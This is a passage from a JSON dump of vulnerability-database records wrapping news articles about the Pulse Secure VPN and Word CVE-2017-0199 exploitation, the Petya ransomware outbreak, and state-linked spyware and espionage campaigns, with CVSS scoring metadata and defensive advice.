publicity.\"\n\nAt the heart of these intrusions lies [CVE-2021-22893](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>), a recently patched vulnerability in Pulse Secure VPN devices that the adversaries exploited to gain an initial foothold on the target network, using it to steal credentials, escalate privileges, conduct internal reconnaissance by moving laterally across the network, before maintaining long-term persistent access, and accessing sensitive data.\n\n\"Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration,\" the researchers said. \"They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-28T07:29:00", "type": "thn", "title": "Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-29T08:17:43", "id": "THN:603F844B99A1CC0CF1DE580659626B57", "href": "https://thehackernews.com/2021/05/chinese-cyber-espionage-hackers.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[![](https://thehackernews.com/images/-IPYvggwn6XM/YJD7KaAKMwI/AAAAAAAACck/8bYszyL6u9IfDFcNzx4jcnFXKFQMRJ5NQCLcBGAsYHQ/s0/pulse-vpn.jpg)](<https://thehackernews.com/images/-IPYvggwn6XM/YJD7KaAKMwI/AAAAAAAACck/8bYszyL6u9IfDFcNzx4jcnFXKFQMRJ5NQCLcBGAsYHQ/s0/pulse-vpn.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors.\n\nTracked as [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) (CVSS score 10), the flaw concerns \"multiple use after free\" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted.\n\nThe flaw came to light on April 20 after FireEye [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks.\n\nThe development promoted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an [Emergency Directive](<https://www.cisa.gov/news/2021/04/20/cisa-issues-emergency-directive-requiring-federal-agencies-check-pulse-connect>) urging federal agencies and civilian departments to mitigate any anomalous activity or active exploitation detected on their networks.\n\n[![](https://thehackernews.com/images/-MkjnmX9bSrs/YJD7dbZ3IQI/AAAAAAAACcs/Bz7ex--si1ots__08HdxtIU7xkoM1_fOACLcBGAsYHQ/s0/vpn-hacking.jpg)](<https://thehackernews.com/images/-MkjnmX9bSrs/YJD7dbZ3IQI/AAAAAAAACcs/Bz7ex--si1ots__08HdxtIU7xkoM1_fOACLcBGAsYHQ/s0/vpn-hacking.jpg>)\n\nFollowing an investigation conducted in conjunction with FireEye Mandiant, Ivanti said the attacks were observed on a \"very limited number\" of customer systems. FireEye is tracking the activity under two separate clusters UNC2630 and UNC2717 citing differences in the malicious web shells that were dropped on the compromised devices.\n\n\"As sophisticated threat actors continue their attacks on U.S. businesses and government agencies, we will continue to work with our customers, the broader security industry, law enforcement and government agencies to mitigate these threats,\" the Utah-based software firm [said](<https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/>).\n\n\"Companywide we are making significant investments to enhance our overall cybersecurity posture, including a more broad implementation of secure application development standards.\"\n\nPulse Secure customers are advised to move quickly to apply the update to ensure they are protected. The company has also released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to check for signs of compromise and identify malicious activity on their systems.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-04T07:52:00", "type": "thn", "title": "Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-04T08:21:24", "id": "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "href": "https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T09:18:15", "description": "[![microsoft-word-zero-day-exploit](https://1.bp.blogspot.com/-QMVYkLsFBBI/WO85KgO5uTI/AAAAAAAAsLo/Y_fGkcpuenoZW8pcWQ-g0-hI8KJ0BmuRwCLcB/s1600/microsoft-word-zero-day-exploit.png)](<https://1.bp.blogspot.com/-QMVYkLsFBBI/WO85KgO5uTI/AAAAAAAAsLo/Y_fGkcpuenoZW8pcWQ-g0-hI8KJ0BmuRwCLcB/s1600/microsoft-word-zero-day-exploit.png>)\n\nRecently we reported about a critical [code execution vulnerability in Microsoft Word](<https://thehackernews.com/2017/04/microsoft-word-zero-day.html>) that was being exploited in the wild by cyber criminal groups to distribute malware like [Dridex banking trojans](<https://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html>) and Latentbot. \n \nNow, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also actively being exploited by the government-sponsored hackers to spy on Russian targets since at least this January. \n \nThe news comes after security firm FireEye, that independently discovered this flaw last month, published a [blog post](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), revealing that **FinSpy** spyware was installed as early as January using the same vulnerability in Word that was [patched on Tuesday](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>) by Microsoft. \n \nFor those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML app from a server, disguised as a document created in Microsoft's RTF (Rich Text Format). \n \n[FinSpy or FinFisher](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>) is associated with the controversial UK-based firm Gamma Group, which sells so-called \"lawful intercept\" spyware to governments around the world. \n\n\n> \"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it,\" FireEye researchers said. \n\n> \n\"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective\u2014a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\"\n\nMonths later in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals. \n \nLatentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software. \n\n\n> FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like \"hire_form.doc\", \"!!!!URGENT!!!!READ!!!.doc\", \"PDP.doc\", and \"document.doc\".\n\nHowever, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called **Terdot**, which then installed software that uses the TOR anonymity service to hide the identity of the servers it contacted with. \n \nAccording to FireEye researchers, the MS Word exploit used to install Finspy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers was obtained from the same source. \n \nThis finding highlights that someone who initially discovered this zero-day vulnerability sold it to many actors, including the commercial companies who deals in buying and selling of zero-day exploits as well as financially motivated online criminals. \n \nAlso, just Monday evening, Proofpoint researchers too discovered [a massive campaign of spam email](<https://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html>) targeting millions of users across financial institutions in Australia with the Dridex banking malware, again, by exploiting the same vulnerability in Word. \n \nFireEye researchers are still not sure of the source for the exploit that delivered the [Dridex banking trojan](<https://thehackernews.com/2016/02/botnet-antivirus.html>), but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them. \n \nMicrosoft patched the MS Word vulnerability on Tuesday, which hackers, as well as government spies, had been exploiting it for months. So, users are strongly advised to install updates as soon as possible to protect themselves against the ongoing attacks.\n", "cvss3": {}, "published": "2017-04-12T21:41:00", "type": "thn", "title": "Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-13T08:41:46", "id": "THN:CB1C2DA47986D8345154BCABBFE41314", "href": "https://thehackernews.com/2017/04/microsoft-word-zeroday.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:08", "description": "[![petya-ransomware](https://3.bp.blogspot.com/-Z9KXBRVMLAg/WVJqrHoMqdI/AAAAAAAAtWc/daYeKHPIzwoiwG30oaiSWGhJkkT39PjmQCLcBGAs/s1600/petya-ransomware.png)](<https://3.bp.blogspot.com/-Z9KXBRVMLAg/WVJqrHoMqdI/AAAAAAAAtWc/daYeKHPIzwoiwG30oaiSWGhJkkT39PjmQCLcBGAs/s1600/petya-ransomware.png>)\n\nWatch out, readers! It is ransomware, another WannaCry, another wide-spread attack. \n \nThe [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) is not dead yet and another large scale ransomware attack is making chaos worldwide, shutting down computers at corporates, power supplies, and banks across Russia, Ukraine, Spain, France, UK, India, and Europe and demanding $300 in bitcoins. \n \nAccording to multiple sources, a new variant of [Petya ransomware](<https://thehackernews.com/2016/04/ransomware-decrypt-tool.html>), also known as Petwrap, is spreading rapidly with the help of same [Windows SMBv1 vulnerability](<https://thehackernews.com/2017/06/windows-10-redstone3-smb.html>) that the WannaCry ransomware abused to infect 300,000 systems and servers worldwide in just 72 hours last month. \n \nApart from this, many victims have also informed that Petya ransomware has also infected their patch systems. \n \n\n\n> \"Petya uses the NSA Eternalblue exploit but also spreads in internal networks with WMIC and PSEXEC. That's why patched systems can get hit.\" Mikko Hypponen [confirms](<https://twitter.com/mikko/status/879742221326721028>), Chief Research Officer at F-Secure.\n\n \n[Petya](<https://thehackernews.com/2016/04/ransomware-decrypt-tool.html>) is a nasty piece of ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one. \n \nInstead, Petya reboots victims computers and encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk. \n \nPetya ransomware replaces the computer's MBR with its own malicious code that displays the ransom note and leaves computers unable to boot. \n \n\n\n### Don't Pay Ransom, You Wouldn\u2019t Get Your Files Back \n\nInfected users are advised not to pay the ransom because hackers behind Petya ransomware can\u2019t get your emails anymore. \n \nPosteo, the German email provider, has [suspended](<https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt>) the email address i.e. wowsmith123456@posteo.net, which was behind used by the criminals to communicate with victims after getting the ransom to send the decryption keys. \n \nAt the time of writing, 23 victims have [paid](<https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX>) in Bitcoin to '_1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX_' address for decrypting their files infected by Petya, which total roughly $6775. \n\n\n### Petya! Petya! Another Worldwide Ransomware Attack\n\n[![Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry](https://1.bp.blogspot.com/-vPs3Wq0Xwn8/WVJxtAOo0vI/AAAAAAAAtWs/XhMNPhiPc6wiw4NSgBRZhy9zb0D44S_yQCLcBGAs/s1600/petya-ransomware.png)](<https://1.bp.blogspot.com/-vPs3Wq0Xwn8/WVJxtAOo0vI/AAAAAAAAtWs/XhMNPhiPc6wiw4NSgBRZhy9zb0D44S_yQCLcBGAs/s1600/petya-ransomware.png>)\n\n \nScreenshots of the latest Petya infection, shared on Twitter, shows that the ransomware displays a text, demanding $300 worth of Bitcoins. Here's what the text read: \n\n\n> \"_If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don't waste your time. Nobody can recover your files without our decryption service_.\"\n\nAccording to a recent [VirusTotal scan](<https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/>), currently, only 16 out of 61 anti-virus services are successfully detecting the Petya ransomware malware. \n \n\n\n### Petya Ransomware Hits Banks, Telecom, Businesses & Power Companies\n\n[![petya-ransomware](https://1.bp.blogspot.com/-FYNtTeboMbs/WVJ6i2ou6XI/AAAAAAAAtXI/TxltxMo7moQhEd2c92u49mwD2k9Cdu0sQCLcBGAs/s1600/petya-ransomware.png)](<https://1.bp.blogspot.com/-FYNtTeboMbs/WVJ6i2ou6XI/AAAAAAAAtXI/TxltxMo7moQhEd2c92u49mwD2k9Cdu0sQCLcBGAs/s1600/petya-ransomware.png>) \n--- \nSupermarket in Kharkiv, East Ukraine \nPetya ransomware has already infected \u2014 Russian state-owned oil giant Rosneft, Ukrainian state electricity suppliers, \"Kyivenergo\" and \"Ukrenergo,\" in past few hours. \n\n\n> \"_We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine's Security Service (SBU) to switch them back on,_\" Kyivenergo's press service said.\n\nThere are reports from several banks, including National Bank of Ukraine (NBU) and Oschadbank, as well as other companies confirming they have been hit by the Petya ransomware attacks. \n \nMaersk, an international logistics company, has also confirmed on [Twitter](<https://twitter.com/Maersk/status/879679584282738688>) that the latest Petya ransomware attacks have shut down its IT systems at multiple locations and business units. \n\n\n> \"We can confirm that Maersk IT systems are down across multiple sites and business units. We are currently asserting the situation. The safety of our employees, our operations and customers' business is our top priority. We will update when we have more information,\" the company said.\n\nThe ransomware also impacts multiple workstations at Ukrainian branch's mining company Evraz. \n \nThe most severe damages reported by Ukrainian businesses also include compromised systems at Ukraine's [local ](<https://twitter.com/kyivmetroalerts/status/879670749149245440>)[metro](<https://twitter.com/kyivmetroalerts/status/879670749149245440>) and [Kiev's Boryspil Airport](<https://www.facebook.com/eugenedihne/?hc_ref=PAGES_TIMELINE&fref=nf>). \n \nThree Ukrainian telecommunication operators, Kyivstar, LifeCell, Ukrtelecom, are also affected in the latest Petya attack. \n \n\n\n### How Petya Ransomware Spreading So Fast?\n\n \nSymantec, the cyber security company, has also confirmed that Petya ransomware is exploiting SMBv1 [EternalBlue exploit](<https://thehackernews.com/2017/04/window-zero-day-patch.html>), just like WannaCry, and taking advantage of unpatched Windows machines. \n \n\"_Petya ransomware successful in spreading because it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010),_\" security researcher using Twitter handle \u200fHackerFantastic [tweeted](<https://twitter.com/hackerfantastic/status/879719012929875968>). \n \n**EternalBlue** is a Windows SMB exploit leaked by the infamous hacking group [Shadow Brokers](<https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html>) in its April data dump, who claimed to have stolen it from the US intelligence agency NSA, along with other Windows exploits. \n \nMicrosoft has since [patched the vulnerability](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) for all versions of Windows operating systems, but many users remain vulnerable, and a string of malware variants are exploiting the flaw to deliver ransomware and [mine cryptocurrency](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>). \n \nJust three days ago, we reported about the latest WannaCry attack that [hit Honda Motor Company and around 55 speed](<https://thehackernews.com/2017/06/honda-wannacry-attack.html>) and traffic light cameras in Japan and Australia, respectively. \n \nWell, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big corporates and companies have not yet implemented proper security measures to defend against such threat. \n \n\n\n### How to Protect Yourself from Ransomware Attacks\n\n[![petya-ransomware-attack](https://3.bp.blogspot.com/-O1fxb4YP3FI/WVKsduCRy1I/AAAAAAAAtXs/_da8_kmnVMw1HmJzMStNcLAADgoba1DnwCLcBGAs/s1600/petya-ransomware-attack.png)](<https://3.bp.blogspot.com/-O1fxb4YP3FI/WVKsduCRy1I/AAAAAAAAtXs/_da8_kmnVMw1HmJzMStNcLAADgoba1DnwCLcBGAs/s1600/petya-ransomware-attack.png>)\n\n**What to do immediately? **Go and apply those [goddamn patches](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) against EternalBlue (MS17-010) and disable the unsecured, 30-year-old [SMBv1 file-sharing protocol](<https://thehackernews.com/2017/06/windows-10-redstone3-smb.html>) on your Windows systems and servers. \n \nSince Petya Ransomware is also taking advantage of WMIC and PSEXEC tools to infect fully-patched Windows computers, you are also advised to [disable WMIC](<https://msdn.microsoft.com/en-us/library/aa826517\$v=vs.85\$.aspx>) (Windows Management Instrumentation Command-line). \n \n\n\n#### Prevent Infection & Petya Kill-Switch\n\nResearcher [finds](<https://twitter.com/hackerfantastic/status/879773992726532096>) Petya ransomware encrypt systems after rebooting the computer. So if your system is infected with Petya ransomware and it tries to restart, just do not power it back on. \n\n\n> \"_If machine reboots and you see this message, power off immediately! This is the encryption process. If you do not power on, files are fine._\" \u200fHackerFantastic [tweeted](<https://twitter.com/hackerfantastic/status/879775570766245888?s=07>). \"_Use a LiveCD or external machine to recover files_\"\n\n[PT Security](<https://twitter.com/PTsecurity_UK/status/879779707075665922>), a UK-based cyber security company and [Amit Serper](<https://twitter.com/0xAmit/status/879778335286452224>) from Cybereason, have discovered a Kill-Switch for Petya ransomware. According to a tweet, company has advised users to create a file i.e. \"**_C:\\Windows\\perfc_**\" to prevent ransomware infection. \n \nTo safeguard against any ransomware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source. \n \nTo always have a tight grip on your valuable data, keep a good back-up routine in place that makes their copies to an external storage device that isn't always connected to your PC. \n \nMoreover, make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Most importantly, always browse the Internet safely.\n", "cvss3": {}, "published": "2017-06-27T03:32:00", "type": "thn", "title": "Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-06-27T19:56:23", "id": "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "href": "https://thehackernews.com/2017/06/petya-ransomware-attack.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEhrtdtzqyNeApmjas_KtNLGDhRP6hBbNWRgbf9IaFm5y-yBvI13rEsw4yihp4la0LHJL9-6namJONo3mOznRJPuyncLGave3YosvLrwqrmvhVPB-ORkzapKMGCempnE6ljNxp5YetWOw3KujLkW2oTmAo2itN7JuuyHbMe1tCmKO2qPmXy1lUPQnz_A)](<https://thehackernews.com/new-images/img/a/AVvXsEhrtdtzqyNeApmjas_KtNLGDhRP6hBbNWRgbf9IaFm5y-yBvI13rEsw4yihp4la0LHJL9-6namJONo3mOznRJPuyncLGave3YosvLrwqrmvhVPB-ORkzapKMGCempnE6ljNxp5YetWOw3KujLkW2oTmAo2itN7JuuyHbMe1tCmKO2qPmXy1lUPQnz_A>)\n\nA prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa.\n\nAmnesty International tied the covert attack campaign to a collective tracked as \"[Donot Team](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt-c-35>)\" (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence coupling the group's infrastructure to an Indian company called Innefu Labs. The unnamed activist is believed to have targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-loaded emails.\n\n\"The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application,\" Amnesty International [said](<https://www.amnesty.org/en/latest/news/2021/10/togo-activist-targeted-with-spyware-by-notorious-hacker-group/>) in a report published last week. \"The application was in fact a piece of custom Android spyware designed to extract some of the most sensitive and personal information stored on the activist's phone.\"\n\nThe messages originated from a WhatsApp account associated with an Indian phone number that's registered in the state of Jammu and Kashmir. Once installed, the malicious software \u2014 which takes the form of an app named \"ChatLite\" \u2014 grants the adversary permissions to access the camera and microphone, gather photos and files stored on the device, and even grab WhatsApp messages as they are being sent and received. \n\nBut when the aforementioned attempt failed, the attackers switched to an alternate infection chain in which an email sent from a Gmail account contained a malware-laced Microsoft Word document that leveraged a now-patched remote code execution vulnerability ([CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)) to drop a full-fledged Windows spying tool known as the YTY framework that grants complete access to the victim's machine.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEgH5e2pEM0OYbJv37coxDF9ekjhsgYHqG9-heDCOY3PaZwmK8LI2__WPxVBO8E_fmPlQ36NymScZQ0_v_DJxzvFMy2jrwBnSCRu7yDu85w1Px1378_uUNSFvpTkGLyj1cz0bB9fRiBP71oEKdTIC5JKOq3hjYgtTVrOfzb-vCAOepn__XG8fIg9VKSz)](<https://thehackernews.com/new-images/img/a/AVvXsEgH5e2pEM0OYbJv37coxDF9ekjhsgYHqG9-heDCOY3PaZwmK8LI2__WPxVBO8E_fmPlQ36NymScZQ0_v_DJxzvFMy2jrwBnSCRu7yDu85w1Px1378_uUNSFvpTkGLyj1cz0bB9fRiBP71oEKdTIC5JKOq3hjYgtTVrOfzb-vCAOepn__XG8fIg9VKSz>)\n\n\"The spyware can be used to steal files from the infected computer and any connected USB drives, record keystrokes, take regular screenshots of the computer, and download additional spyware components,\" the researchers said.\n\nAlthough Innefu Labs has not been directly implicated in the incident, Amnesty International said it discovered a domain (\"server.authshieldserver.com\") that pointed to an IP address (122.160.158[.]3) used by the Delhi-based cybersecurity company. In a statement shared with the non-governmental organization, Innefu Labs denied any connection to the Donot Team APT, adding \"they are not aware of any use of their IP address for the alleged activities.\"\n\nWe have reached out to the company for further comment, and we will update the story if we hear back.\n\n\"The worrying trend of private companies actively performing unlawful digital surveillance increases the scope for abuse while reducing avenues for domestic legal redress, regulation, and judicial control,\" Amnesty said. \"The nature of cross-border commercial cyber surveillance where the surveillance targets, the operators, the end customer, and the attack infrastructure can all be located in different jurisdictions creates significant impediments to achieving remediation and redress for human rights abuses.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-11T09:21:00", "type": "thn", "title": "Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-10-11T17:00:22", "id": "THN:52153F8855D24E20FDD2CC03040B1EF1", "href": "https://thehackernews.com/2021/10/indian-made-mobile-spyware-targeted.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:41", "description": "[![copykittens-cyber-espionage-hacking-group](https://2.bp.blogspot.com/-h2BjeCLuryM/WXdbYjmyXiI/AAAAAAAAtxU/lwiWctR8i4UXdds8589JzGPLHepdWbfvACLcBGAs/s1600/copykittens-cyber-espionage-hacking-group.png)](<https://2.bp.blogspot.com/-h2BjeCLuryM/WXdbYjmyXiI/AAAAAAAAtxU/lwiWctR8i4UXdds8589JzGPLHepdWbfvACLcBGAs/s1600/copykittens-cyber-espionage-hacking-group.png>)\n\nSecurity researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries. \n \nThe campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky. \n \nDubbed by researchers **CopyKittens (aka Rocket Kittens)**, the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany. \n \nThe targeted organisations include government institutions like Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations. \n \nThe latest report [[PDF](<http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf>)], dubbed \"**Operation Wilted Tulip**,\" details an active espionage campaign conducted by the CopyKittens hackers, a vast range of tools and tactics they used, its command and control infrastructure, and the group's modus operandi. \n \n\n\n### How CopyKittens Infects Its Targets\n\n \nThe group used different tactics to infiltrate their targets, which includes watering hole attacks \u2014 wherein JavaScript code is inserted into compromised websites to distribute malicious exploits. \n \nThe news media and organisations whose websites were abused as watering hole attacks include The Jerusalem Post, for which even German Federal Office for Information Security (BSI) issued an alert, Maariv news and IDF Disabled Veterans Organization. \n \nBesides water hole attacks, CopyKittens also used other methods to deliver malware, including: \n \n\n\n * Emailed links to malicious websites controlled by attackers.\n * Weaponized Office documents exploiting recently discovered flaw ([CVE-2017-0199](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>)).\n * Web servers exploitation using vulnerability scanner and SQLi tools like Havij, sqlmap, and Acunetix.\n * Fake social media entities to build trust with targets and potentially spread malicious links.\n \n\n\n> \"The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection \u2013 before pivoting to higher value targets on the network,\" Trend Micro writes in a [blog post](<http://blog.trendmicro.com/copykittens-exposed-clearsky-trend-micro/>).\n\nIn order to infect its targets, CopyKittens makes use of its own custom malware tools in combination with existing, commercial tools, like Red Team software Cobalt Strike, Metasploit, post-exploitation agent Empire, TDTESS backdoor, and credential dumping tool Mimikatz. \n \nDubbed **Matryoshka**, the remote access trojan is the group's self-developed malware which uses DNS for command and control (C&C) communication and has the ability to steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access. \n\n\n> \"Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open,\" Clear Sky says in a [blog post](<http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/>).\n\nThe initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017, though the group also developed and used Matryoshka version 2. \n \nUsers are recommended to enable two-factor authentication in order to protect their webmail accounts from being compromised, which is a treasure trove of information for hackers, and an \"extremely strong initial beachhead\" for pivoting into other targets.\n", "cvss3": {}, "published": "2017-07-25T04:11:00", "type": "thn", "title": "Experts Unveil Cyber Espionage 